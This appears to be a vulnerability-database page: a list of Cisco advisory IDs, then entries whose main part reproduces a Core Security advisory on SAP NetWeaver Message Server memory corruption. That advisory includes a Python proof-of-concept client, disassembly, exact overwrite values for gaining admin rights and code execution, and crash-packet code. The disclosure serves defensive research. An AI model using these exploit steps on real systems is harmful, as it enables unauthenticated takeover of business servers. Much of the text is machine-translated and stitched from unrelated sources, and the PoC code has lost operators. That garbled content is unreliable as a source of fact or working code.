cisco-sa-cimc-cmd-inj-mux4c5aj	Cisco Integrated Management Controller CLI Command Injection Vulnerability
cisco-sa-finesse-ssrf-rfi-um7wt8ew	Cisco Finesse Web-Based Management Interface Vulnerabilities
cisco-sa-snort3-ips-bypass-ue69kbmd	Multiple Cisco Products Snort 3 HTTP Intrusion Prevention System Rule Bypass Vulnerability
cisco-sa-ftd-archive-bypass-z4wqjwcn	Cisco Firepower Threat Defense Software Encrypted Archive File Policy Bypass Vulnerability
cisco-sa-asaftd-ogsnsg-aclbyp-3xb8q6jx	Cisco Adaptive Security Appliance and Firepower Threat Defense Software Inactive-to-Active ACL Bypass Vulnerability
cisco-sa-asaftd-dos-njvawoeq	Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software DNS Inspection Denial of Service Vulnerability
cisco-sa-asaftd-persist-rce-flsnxf4h	Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability
cisco-sa-asaftd-cmd-inj-zjv8wysm	Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability
cisco-sa-snmp-uwbxfqww	Cisco IOS and IOS XE Software SNMP Extended Named Access Control List Bypass Vulnerability
cisco-sa-isis-sgjyouhx	Cisco IOS and IOS XE Software Intermediate System-to-Intermediate System Denial of Service Vulnerability
cisco-sa-iosxe-wlc-privesc-rjsmrmpk	Cisco IOS XE Software for Wireless LAN Controllers Privilege Escalation Vulnerability
cisco-sa-ios-xe-sda-edge-dos-qzwuwxwg	Cisco IOS XE Software SD-Access Fabric Edge Node Denial of Service Vulnerability
cisco-sa-aux-333wbz8f	Cisco IOS XE Software Auxiliary Asynchronous Port Denial of Service Vulnerability
cisco-sa-ap-secureboot-bypass-zt5vjksd	Cisco Access Point Software Secure Boot Bypass Vulnerability
cisco-sa-ap-dos-h9tggx6w	Cisco Access Point Software Denial of Service Vulnerability
cisco-sa-iosxr-redis-abjye5xk	Cisco IOS XR Software Health Check Open Port Vulnerability
cisco-sa-xrl2vpn-jesru3fc	Cisco IOS XR Software Layer 2 Services Denial of Service Vulnerability
cisco-sa-snmp-uhv6zdef	Cisco IOS XR Software SNMP Management Plane Protection ACL Bypass Vulnerability
cisco-sa-iosxr-ssh-privesc-ewdmkew3	Cisco IOS XR Software SSH Privilege Escalation Vulnerability
cisco-sa-iosxr-scp-dos-kb6suuhw	Cisco IOS XR Software Authenticated CLI Secure Copy Protocol and SFTP Denial of Service Vulnerability
cisco-sa-iosxr-pppma-jkwfgnew	Cisco IOS XR Software for ASR 9000 Series Aggregation Services Routers PPPoE Denial of Service Vulnerability
cisco-sa-iosxr-dhcp-dos-3tgpkrdm	Cisco IOS XR Software DHCP Version 4 Server Denial of Service Vulnerability
cisco-sa-iosxr-acl-bypass-rzu5nl3e	Cisco IOS XR Software MPLS and Pseudowire Interfaces Access Control List Bypass Vulnerabilities
cisco-sa-duo-infodisc-rlceqm6t	Cisco Duo Authentication for Windows Logon and RDP Information Disclosure Vulnerability
cisco-sa-secure-privesc-syxqo6ds	Cisco Secure Client for Linux with ISE Posture Module Privilege Escalation Vulnerability

Vulnerabilities are sorted by update time (recent to old).
ID	Description
var-202001-0832	A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code. SAP NetWeaver Contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. The vulnerability is due to a memory pointer error while processing certain packets by the affected software. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ CORE-2012-1128 1. Advisory Information Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release 2. Vulnerability Information Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593 3. By sending different messages, the different vulnerabilities can be triggered. 4. Vulnerable packages . Older versions are probably affected too, but they were not checked. 5. Non-vulnerable packages . Vendor did not provide this information. 6. Vendor Information, Solutions and Workarounds SAP released the security note 1800603 [2] regarding these issues. 7. Credits Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. Technical Description / Proof of Concept Code The following python script is the main PoC that can be used to reproduce all vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args() client_string = '-'+' '39 server_name = '-'+' '39 def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize_connection(hostname, port): # Connect print "[] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[] Conected, sending login request" init = 'MESSAGE\x00' # eyecatcher init+= '\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection # Main PoC body connection = initialize_connection(options.hostname, options.port) send_attack(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module. The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows: /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function: /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax8] lea esi, j2ee_stat_services.totalMsgCount[esi8] ;using the index without validating array bounds -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct: /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below: /----- At this point: ESI points to an arbitrary, attacker-controlled memory address * EBX == 1 .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ; --------------------------------------------------------------------------- .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ; --------------------------------------------------------------------------- .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ; --------------------------------------------------------------------------- .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ; --------------------------------------------------------------------------- .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx [...] -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives: /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8] -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server. A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below: /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client: /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0': /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server. After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation: 1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server. 8.1.1. Gaining remote code execution by overwriting function pointers Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet. One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters: /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58] ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_sleep, \ .data:0087DED0 offset MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2" .data:0087DED0 offset MsSSetMaxSleep> ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost> [...] -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set'). After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function: /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array. 8.1.2. Modify the configuration and behavior of the server* After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). After sending the second 'MS_SET_PROPERTY' packet, the SAP Netweaver Message Server will start listening on the specified port, waiting for connections from instances of the msmon.exe monitoring program [4]. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash) print "[] Crash sent !" -----/ 8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "AD-EYECATCH\x00" crash+= "\x01\x01" crash+= "%11d" % 104 crash+= "%11d" % 1 crash+= "\x15\x00\x00\x00" crash+= "\x20\x00\x00\xc8" crash+= "LALA" + ' '(20-4) crash+= "LOLO" + ' '(40-4) crash+= " "36 send_packet(connection, crash) print "[] Crash sent !" -----/ 9. Report Timeline* . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013. 2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published. 10. References [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. About CoreLabs CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. About Core Security Technologies Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. Disclaimer The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. PGP/GPG Keys This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-104 June 27, 2012 - -- CVE ID: - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: SAP - -- Affected Products: SAP NetWeaver - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407. - -- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40 - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-27 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * e6af8de8b1d4b2b6d5ba2610cbf9cd38 - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t uAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E 1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR XFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3 JqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6 wGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA== =t/ct -----END PGP SIGNATURE-----
var-201208-0222	Multiple stack-based buffer overflows in msg_server.exe in SAP NetWeaver ABAP 7.x allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) long parameter value, (2) crafted string size field, or (3) long Parameter Name string in a package with opcode 0x43 and sub opcode 0x4 to TCP port 3900. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. NetWeaver ABAP is prone to a denial-of-service vulnerability
var-202108-1148	An access issue was addressed with improved access restrictions. This issue is fixed in macOS Monterey 12.0.1. A malicious application may be able to access local users' Apple IDs. apple's macOS Exists in unspecified vulnerabilities.Information may be obtained. REJECT DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by the CVE program. Notes: none
var-200202-0006	Vulnerabilities in a large number of SNMP implementations allow remote attackers to cause a denial of service or gain privileges via SNMPv1 trap handling, as demonstrated by the PROTOS c06-SNMPv1 test suite. NOTE: It is highly likely that this candidate will be SPLIT into multiple candidates, one or more for each vendor. This and other SNMP-related candidates will be updated when more accurate information is available. Multiple vendor SNMPv1 Trap handling implementations contain vulnerabilities that may allow unauthorized privileged access, denial-of-service conditions, or unstable behavior . If your site uses SNMP in any capacity, the CERT/CC encourages you to read the information provided below. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ SNMP Protocol is status and performance information MIB (Management Information Base) Protocol used to exchange Management side SNMP Managers such as managed routers, switches and printers SNMP Communicates with management network devices called agents. Because of its wide acceptance in the market, SNMP Has become the standard for SNMP protocol version1 Is SNMPv1 Is the most widely implemented. this SNMPv1 Sent from the agent to the manager in the implementation of SNMP Trap message and sent from the manager to the agent SNMP Decrypt the request message / There are problems in interpreting. If this problem is used by an attacker, the following actions may be executed. Many other programs that you implement may also be affected because of a protocol problem. On the target host SNMP If the service is running, an attacker could execute arbitrary code ・ If a buffer overflow attack is feasible and a very long trap message SNMP If the host on which the service is running receives, the application may go into a denial of service state The effects described above vary from application to application. For details, refer to each product.Please refer to the “Overview” for the impact of this vulnerability. Windows 95 is prone to a denial-of-service vulnerability. MPE/iX is an Internet-ready operating system for the HP e3000 class servers. It is possible to crash the service by transmitting to it a maliciously constructed SNMPv1 request PDU. It was previously known as UCD-SNMP. They typically notify the manager that some event has occured or otherwise provide information about the status of the agent. Multiple vulnerabilities have been discovered in a number of SNMP implementations. The vulnerabilities are known to exist in the process of decoding and interpreting SNMP trap messages. Among the possible consequences are denial of service and allowing attackers to compromise target systems. These depend on the individual vulnerabilities in each affected product. HP has confirmed that large traps will cause OpenView Network Node Manager to crash. This may be due to an exploitable buffer overflow condition
